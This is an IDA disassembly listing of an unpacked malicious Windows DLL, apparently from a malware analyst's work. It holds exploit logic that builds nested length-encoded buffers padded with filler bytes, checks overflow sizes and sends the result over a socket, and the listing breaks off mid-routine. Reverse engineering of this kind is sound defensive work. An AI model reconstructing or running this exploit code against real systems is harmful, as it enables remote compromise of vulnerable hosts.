;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : F20928667AFB530FDD8372B277049897
; File Name : u:\work\f20928667afb530fdd8372b277049897_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 0000AC7C ( 44156.)
; Section size in file : 0000B000 ( 45056.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: DLL 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 10001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001000 proc near ; CODE XREF: sub_10001433+F�p
; sub_10001433+49�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_10001000 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
push eax
call strlen ; strlen
add esp, 4
push eax
mov ecx, [ebp+8]
push ecx
lea ecx, [ebp-8]
call sub_10001059
mov edx, [eax]
mov eax, [eax+4]
mov ecx, [ebp-0Ch]
mov [ecx], edx
mov [ecx+4], eax
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10001059(void *Src,size_t Size)
sub_10001059 proc near ; CODE XREF: .text:1000103E�p
; sub_10001433+147�p
var_8 = dword ptr -8
Dst = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+Size]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_1000107A
jmp short loc_100010B1
; ---------------------------------------------------------------------------
loc_1000107A: ; CODE XREF: sub_10001059+1D�j
mov ecx, [ebp+Size]
push ecx ; Size
push 0 ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+Size]
push eax ; Size
mov ecx, [ebp+Src]
push ecx ; Src
mov edx, [ebp+Dst]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+Size]
mov [eax+4], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+Dst]
mov [edx], eax
loc_100010B1: ; CODE XREF: sub_10001059+1F�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 8
sub_10001059 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100010BA(void *Src,size_t Size,int,int)
sub_100010BA proc near ; CODE XREF: sub_1000127E+20�p
; sub_10001324+21�p ...
var_8 = dword ptr -8
Dst = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+Size]
add eax, [ebp+arg_C]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_100010DE
jmp short loc_10001132
; ---------------------------------------------------------------------------
loc_100010DE: ; CODE XREF: sub_100010BA+20�j
mov ecx, [ebp+Size]
add ecx, [ebp+arg_C]
push ecx ; Size
push 0 ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+Size]
push eax ; Size
mov ecx, [ebp+Src]
push ecx ; Src
mov edx, [ebp+Dst]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
push eax ; Size
mov ecx, [ebp+arg_8]
push ecx ; Src
mov edx, [ebp+Dst]
add edx, [ebp+Size]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, [ebp+Size]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov edx, [ebp+var_8]
mov eax, [ebp+Dst]
mov [edx], eax
loc_10001132: ; CODE XREF: sub_100010BA+22�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 10h
sub_100010BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000113B proc near ; CODE XREF: sub_1000127E+7F�p
; sub_1000127E+9B�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_10001159
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10001159: ; CODE XREF: sub_1000113B+D�j
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov esp, ebp
pop ebp
retn
sub_1000113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001170 proc near ; CODE XREF: sub_1000127E+28�p
; sub_100013AB+C�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Dst = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cmp dword ptr [eax+4], 0FFFFh
jl short loc_1000118C
xor al, al
jmp loc_1000127A
; ---------------------------------------------------------------------------
loc_1000118C: ; CODE XREF: sub_10001170+13�j
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+4], 7Fh
jge short loc_1000119E
mov [ebp+var_8], 1
jmp short loc_100011A5
; ---------------------------------------------------------------------------
loc_1000119E: ; CODE XREF: sub_10001170+23�j
mov [ebp+var_8], 3
loc_100011A5: ; CODE XREF: sub_10001170+2C�j
mov edx, [ebp+var_C]
mov eax, [edx+4]
add eax, [ebp+var_8]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_100011C8
xor al, al
jmp loc_1000127A
; ---------------------------------------------------------------------------
loc_100011C8: ; CODE XREF: sub_10001170+4F�j
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
add edx, [ebp+var_8]
push edx ; Size
push 0 ; Val
mov eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
cmp [ebp+var_8], 1
jnz short loc_1000120F
mov ecx, [ebp+Dst]
mov edx, [ebp+var_C]
mov al, [edx+4]
mov [ecx], al
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
push edx ; Size
mov eax, [ebp+var_C]
mov ecx, [eax]
push ecx ; Src
mov edx, [ebp+Dst]
add edx, 1
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
jmp short loc_10001252
; ---------------------------------------------------------------------------
loc_1000120F: ; CODE XREF: sub_10001170+74�j
mov eax, [ebp+Dst]
mov byte ptr [eax], 82h
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
sar edx, 8
mov eax, [ebp+Dst]
mov [eax+1], dl
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
and edx, 0FFh
mov eax, [ebp+Dst]
mov [eax+2], dl
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
push edx ; Size
mov eax, [ebp+var_C]
mov ecx, [eax]
push ecx ; Src
mov edx, [ebp+Dst]
add edx, 3
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
loc_10001252: ; CODE XREF: sub_10001170+9D�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_C]
mov eax, [ebp+var_8]
add eax, [edx+4]
mov ecx, [ebp+var_C]
mov [ecx+4], eax
mov edx, [ebp+var_C]
mov eax, [ebp+Dst]
mov [edx], eax
mov al, 1
loc_1000127A: ; CODE XREF: sub_10001170+17�j
; sub_10001170+53�j
mov esp, ebp
pop ebp
retn
sub_10001170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000127E proc near ; CODE XREF: sub_10001433+A5�p
; sub_10001433+102�p ...
var_10 = dword ptr -10h
Src = dword ptr -0Ch
Size = dword ptr -8
Dst = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov ecx, [eax+4]
push ecx ; int
mov edx, [ebp+var_10]
mov eax, [edx]
push eax ; int
push 1 ; Size
push offset dword_10012A50 ; Src
lea ecx, [ebp+Src]
call sub_100010BA
lea ecx, [ebp+Src]
call sub_10001170
mov ecx, [ebp+Size]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_100012C8
xor al, al
jmp short loc_10001320
; ---------------------------------------------------------------------------
loc_100012C8: ; CODE XREF: sub_1000127E+44�j
mov edx, [ebp+Size]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+Dst]
mov byte ptr [ecx], 3
mov edx, [ebp+Size]
push edx ; Size
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+Dst]
add ecx, 1
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_10]
call sub_1000113B
mov edx, [ebp+Size]
add edx, 1
mov eax, [ebp+var_10]
mov [eax+4], edx
mov ecx, [ebp+var_10]
mov edx, [ebp+Dst]
mov [ecx], edx
lea ecx, [ebp+Src]
call sub_1000113B
mov al, 1
loc_10001320: ; CODE XREF: sub_1000127E+48�j
mov esp, ebp
pop ebp
retn
sub_1000127E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001324 proc near ; CODE XREF: sub_10001368+1B�p
; sub_1000138E+12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_0]
push ecx ; int
mov edx, [ebp+var_C]
mov eax, [edx+4]
push eax ; Size
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx ; Src
lea ecx, [ebp+var_8]
call sub_100010BA
mov ecx, [ebp+var_C]
call sub_1000113B
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov edx, [ebp+var_4]
mov [eax+4], edx
mov al, 1
mov esp, ebp
pop ebp
retn 8
sub_10001324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10001368(char *Str)
sub_10001368 proc near ; CODE XREF: sub_10001433+112�p
; sub_10001433+18D�p ...
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax
mov ecx, [ebp+Str]
push ecx
mov ecx, [ebp+var_4]
call sub_10001324
mov esp, ebp
pop ebp
retn 4
sub_10001368 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000138E proc near ; CODE XREF: sub_10001401+12�p
; sub_10001433+1DC�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_4]
call sub_10001324
mov esp, ebp
pop ebp
retn 8
sub_1000138E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100013AB proc near ; CODE XREF: sub_10001401+27�p
; sub_10001433+AD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov ecx, [ebp+var_C]
call sub_10001170
and eax, 0FFh
test eax, eax
jnz short loc_100013C9
xor al, al
jmp short loc_100013FD
; ---------------------------------------------------------------------------
loc_100013C9: ; CODE XREF: sub_100013AB+18�j
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx ; int
mov edx, [ebp+var_C]
mov eax, [edx]
push eax ; int
push 1 ; Size
push offset dword_1000E3EC ; Src
lea ecx, [ebp+var_8]
call sub_100010BA
mov ecx, [ebp+var_C]
call sub_1000113B
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [ecx], edx
mov eax, [ebp+var_4]
mov [ecx+4], eax
mov al, 1
loc_100013FD: ; CODE XREF: sub_100013AB+1C�j
mov esp, ebp
pop ebp
retn
sub_100013AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001401 proc near ; CODE XREF: sub_10001433+162�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_4]
call sub_1000138E
and eax, 0FFh
test eax, eax
jnz short loc_10001425
xor al, al
jmp short loc_1000142D
; ---------------------------------------------------------------------------
loc_10001425: ; CODE XREF: sub_10001401+1E�j
mov ecx, [ebp+var_4]
call sub_100013AB
loc_1000142D: ; CODE XREF: sub_10001401+22�j
mov esp, ebp
pop ebp
retn 8
sub_10001401 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001433 proc near ; CODE XREF: sub_10001EBF+EA�p
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
Dst = byte ptr -840h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
lea ecx, [ebp+var_848]
call sub_10001000
cmp [ebp+arg_8], 408h
jg short loc_1000145D
mov eax, [ebp+arg_10]
add eax, 8
cmp eax, 408h
jbe short loc_10001479
loc_1000145D: ; CODE XREF: sub_10001433+1B�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_848]
mov [ecx], edx
mov eax, [ebp+var_844]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
jmp loc_10001807
; ---------------------------------------------------------------------------
loc_10001479: ; CODE XREF: sub_10001433+28�j
lea ecx, [ebp+var_10]
call sub_10001000
lea ecx, [ebp+var_28]
call sub_10001000
lea ecx, [ebp+var_858]
call sub_10001000
lea ecx, [ebp+var_40]
call sub_10001000
lea ecx, [ebp+var_38]
call sub_10001000
lea ecx, [ebp+var_18]
call sub_10001000
lea ecx, [ebp+var_850]
call sub_10001000
push 4
push offset dword_1000E08C
lea ecx, [ebp+var_10]
call sub_10001324
push 3
push offset dword_1000E094
lea ecx, [ebp+var_10]
call sub_10001324
lea ecx, [ebp+var_10]
call sub_1000127E
lea ecx, [ebp+var_10]
call sub_100013AB
push 800h ; Size
push 42h ; Val
lea ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 8
push offset aRbrbrbrb ; "BBBB"
lea ecx, [ebp+var_28]
call sub_10001324
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
lea ecx, [ebp+var_28]
call sub_10001324
mov ecx, 409h
sub ecx, [ebp+var_24]
push ecx
lea edx, [ebp+Dst]
push edx
lea ecx, [ebp+var_28]
call sub_10001324
lea ecx, [ebp+var_28]
call sub_1000127E
push offset dword_1000E3F0 ; Str
lea ecx, [ebp+var_858]
call sub_10001368
lea ecx, [ebp+var_858]
call sub_1000127E
push 800h ; Size
push 44h ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 410h ; Size
lea ecx, [ebp+Dst]
push ecx ; Src
lea ecx, [ebp+var_20]
call sub_10001059
lea ecx, [ebp+var_20]
call sub_1000127E
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_858]
call sub_10001401
lea ecx, [ebp+var_20]
call sub_1000113B
push 800h ; Size
push 43h ; Val
lea ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_40]
call sub_10001368
push 4
push offset dword_1000E098
lea ecx, [ebp+var_40]
call sub_10001324
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_40]
call sub_10001324
mov ecx, 408h
sub ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+Dst]
push edx
lea ecx, [ebp+var_40]
call sub_10001324
lea ecx, [ebp+var_40]
call sub_1000127E
mov eax, [ebp+var_3C]
push eax
mov ecx, [ebp+var_40]
push ecx
lea ecx, [ebp+var_38]
call sub_1000138E
mov edx, [ebp+var_854]
push edx
mov eax, [ebp+var_858]
push eax
lea ecx, [ebp+var_38]
call sub_1000138E
lea ecx, [ebp+var_38]
call sub_100013AB
lea ecx, [ebp+var_40]
call sub_1000113B
lea ecx, [ebp+var_858]
call sub_1000113B
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
lea ecx, [ebp+var_18]
call sub_1000138E
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
call sub_1000138E
mov edx, [ebp+var_34]
push edx
mov eax, [ebp+var_38]
push eax
lea ecx, [ebp+var_18]
call sub_1000138E
lea ecx, [ebp+var_18]
call sub_100013AB
lea ecx, [ebp+var_28]
call sub_1000113B
lea ecx, [ebp+var_10]
call sub_1000113B
lea ecx, [ebp+var_38]
call sub_1000113B
push 800h ; Size
push 41h ; Val
lea ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 400h
lea edx, [ebp+Dst]
push edx
lea ecx, [ebp+var_850]
call sub_10001324
lea ecx, [ebp+var_850]
call sub_1000127E
push 2
push offset dword_1000E404
lea ecx, [ebp+var_850]
call sub_10001324
mov eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_850]
call sub_1000138E
lea ecx, [ebp+var_850]
call sub_100013AB
lea ecx, [ebp+var_18]
call sub_1000113B
lea ecx, [ebp+var_8]
call sub_10001000
lea ecx, [ebp+var_30]
call sub_10001000
mov edx, [ebp+var_84C]
push edx
mov eax, [ebp+var_850]
push eax
lea ecx, [ebp+var_8]
call sub_1000138E
lea ecx, [ebp+var_8]
call sub_10001170
lea ecx, [ebp+var_850]
call sub_1000113B
push offset dword_1000E408 ; Str
lea ecx, [ebp+var_30]
call sub_10001368
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
push edx
lea ecx, [ebp+var_30]
call sub_1000138E
lea ecx, [ebp+var_30]
call sub_10001170
lea ecx, [ebp+var_8]
call sub_1000113B
push offset dword_1000E40C ; Str
lea ecx, [ebp+var_8]
call sub_10001368
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_30]
push ecx
lea ecx, [ebp+var_8]
call sub_1000138E
lea ecx, [ebp+var_8]
call sub_10001170
lea ecx, [ebp+var_30]
call sub_1000113B
push offset dword_1000E410 ; Str
lea ecx, [ebp+var_30]
call sub_10001368
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_30]
call sub_1000138E
lea ecx, [ebp+var_30]
call sub_10001170
lea ecx, [ebp+var_8]
call sub_1000113B
push offset dword_1000E41C ; Str
lea ecx, [ebp+var_848]
call sub_10001368
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_30]
push edx
lea ecx, [ebp+var_848]
call sub_1000138E
lea ecx, [ebp+var_30]
call sub_1000113B
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_848]
mov [eax], ecx
mov edx, [ebp+var_844]
mov [eax+4], edx
mov eax, [ebp+arg_0]
loc_10001807: ; CODE XREF: sub_10001433+41�j
mov esp, ebp
pop ebp
retn
sub_10001433 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000180B(SOCKET s,char *buf,int len,int flags)
sub_1000180B proc near ; CODE XREF: sub_100019DF+18D�p
; sub_100019DF+1DE�p ...
var_218 = dword ptr -218h
var_214 = dword ptr -214h
timeout = timeval ptr -210h
readfds = fd_set ptr -208h
exceptfds = fd_set ptr -104h
s = dword ptr 8
buf = dword ptr 0Ch
len = dword ptr 10h
flags = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
mov [ebp+readfds.fd_count], 0
mov [ebp+exceptfds.fd_count], 0
loc_10001828: ; CODE XREF: sub_1000180B+96�j
mov [ebp+var_214], 0
jmp short loc_10001843
; ---------------------------------------------------------------------------
loc_10001834: ; CODE XREF: sub_1000180B:loc_10001865�j
mov eax, [ebp+var_214]
add eax, 1
mov [ebp+var_214], eax
loc_10001843: ; CODE XREF: sub_1000180B+27�j
mov ecx, [ebp+var_214]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_10001867
mov edx, [ebp+var_214]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_10001865
jmp short loc_10001867
; ---------------------------------------------------------------------------
loc_10001865: ; CODE XREF: sub_1000180B+56�j
jmp short loc_10001834
; ---------------------------------------------------------------------------
loc_10001867: ; CODE XREF: sub_1000180B+44�j
; sub_1000180B+58�j
mov ecx, [ebp+var_214]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_1000189D
cmp [ebp+readfds.fd_count], 40h
jnb short loc_1000189D
mov edx, [ebp+var_214]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_1000189D: ; CODE XREF: sub_1000180B+68�j
; sub_1000180B+71�j
xor edx, edx
test edx, edx
jnz short loc_10001828
loc_100018A3: ; CODE XREF: sub_1000180B+111�j
mov [ebp+var_218], 0
jmp short loc_100018BE
; ---------------------------------------------------------------------------
loc_100018AF: ; CODE XREF: sub_1000180B:loc_100018E0�j
mov eax, [ebp+var_218]
add eax, 1
mov [ebp+var_218], eax
loc_100018BE: ; CODE XREF: sub_1000180B+A2�j
mov ecx, [ebp+var_218]
cmp ecx, [ebp+exceptfds.fd_count]
jnb short loc_100018E2
mov edx, [ebp+var_218]
mov eax, [ebp+edx*4+exceptfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_100018E0
jmp short loc_100018E2
; ---------------------------------------------------------------------------
loc_100018E0: ; CODE XREF: sub_1000180B+D1�j
jmp short loc_100018AF
; ---------------------------------------------------------------------------
loc_100018E2: ; CODE XREF: sub_1000180B+BF�j
; sub_1000180B+D3�j
mov ecx, [ebp+var_218]
cmp ecx, [ebp+exceptfds.fd_count]
jnz short loc_10001918
cmp [ebp+exceptfds.fd_count], 40h
jnb short loc_10001918
mov edx, [ebp+var_218]
mov eax, [ebp+s]
mov [ebp+edx*4+exceptfds.fd_array], eax
mov ecx, [ebp+exceptfds.fd_count]
add ecx, 1
mov [ebp+exceptfds.fd_count], ecx
loc_10001918: ; CODE XREF: sub_1000180B+E3�j
; sub_1000180B+EC�j
xor edx, edx
test edx, edx
jnz short loc_100018A3
mov [ebp+timeout.tv_sec], 0Ah
mov [ebp+timeout.tv_usec], 0
lea eax, [ebp+timeout]
push eax ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
mov eax, [ebp+s]
add eax, 1
push eax ; nfds
call ds:select ; select
cmp eax, 1
jz short loc_1000195F
xor eax, eax
jmp short loc_1000198D
; ---------------------------------------------------------------------------
loc_1000195F: ; CODE XREF: sub_1000180B+14E�j
lea ecx, [ebp+readfds]
push ecx ; fd_set *
mov edx, [ebp+s]
push edx ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jnz short loc_10001977
xor eax, eax
jmp short loc_1000198D
; ---------------------------------------------------------------------------
loc_10001977: ; CODE XREF: sub_1000180B+166�j
mov eax, [ebp+flags]
push eax ; flags
mov ecx, [ebp+len]
push ecx ; len
mov edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
loc_1000198D: ; CODE XREF: sub_1000180B+152�j
; sub_1000180B+16A�j
mov esp, ebp
pop ebp
retn
sub_1000180B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10001991(SOCKET s,int,u_long len)
sub_10001991 proc near ; CODE XREF: sub_100019DF+156�p
; sub_100019DF+1A7�p
buf = byte ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
len = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+len]
push eax ; hostlong
call ds:htonl ; htonl
mov dword ptr [ebp+buf], eax
push 0 ; flags
push 4 ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
cmp eax, 4
jz short loc_100019BD
xor al, al
jmp short loc_100019DB
; ---------------------------------------------------------------------------
loc_100019BD: ; CODE XREF: sub_10001991+26�j
push 0 ; flags
mov eax, [ebp+len]
push eax ; len
mov ecx, [ebp+arg_4]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
xor ecx, ecx
cmp eax, [ebp+len]
setz cl
mov al, cl
loc_100019DB: ; CODE XREF: sub_10001991+2A�j
mov esp, ebp
pop ebp
retn
sub_10001991 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100019DF(SOCKET s,void *Src,int)
sub_100019DF proc near ; CODE XREF: sub_10001BDB+5E�p
Memory = dword ptr -10Ch
len = dword ptr -108h
var_104 = dword ptr -104h
buf = byte ptr -100h
s = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, [ebp+arg_8]
add eax, 41h
mov [ebp+len], eax
mov ecx, [ebp+len]
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
cmp [ebp+Memory], 0
jnz short loc_10001A1A
xor al, al
jmp loc_10001BD7
; ---------------------------------------------------------------------------
loc_10001A1A: ; CODE XREF: sub_100019DF+32�j
mov edx, [ebp+len]
push edx ; Size
push 0 ; Val
mov eax, [ebp+Memory]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_104], 0
push 2Fh ; Size
push offset dword_1000E128 ; Src
mov ecx, [ebp+Memory]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov edx, [ebp+var_104]
add edx, 2Fh
mov [ebp+var_104], edx
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
mov cx, word ptr [ebp+arg_8]
mov [eax], cx
mov edx, [ebp+var_104]
add edx, 2
mov [ebp+var_104], edx
push 8 ; Size
push offset dword_1000E158 ; Src
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_104]
add ecx, 8
mov [ebp+var_104], ecx
mov edx, [ebp+Memory]
add edx, [ebp+var_104]
mov ax, word ptr [ebp+arg_8]
mov [edx], ax
mov ecx, [ebp+var_104]
add ecx, 2
mov [ebp+var_104], ecx
mov edx, [ebp+arg_8]
push edx ; Size
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+Memory]
add ecx, [ebp+var_104]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov edx, [ebp+var_104]
add edx, [ebp+arg_8]
mov [ebp+var_104], edx
push 6 ; Size
push offset dword_10012A48 ; Src
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_104]
add ecx, 6
mov [ebp+var_104], ecx
push 85h ; len
push offset dword_1000E0A0 ; int
mov edx, [ebp+s]
push edx ; s
call sub_10001991
add esp, 0Ch
and eax, 0FFh
test eax, eax
jnz short loc_10001B5A
mov eax, [ebp+Memory]
push eax ; Memory
call ds:free ; free
add esp, 4
xor al, al
jmp short loc_10001BD7
; ---------------------------------------------------------------------------
loc_10001B5A: ; CODE XREF: sub_100019DF+165�j
push 0 ; flags
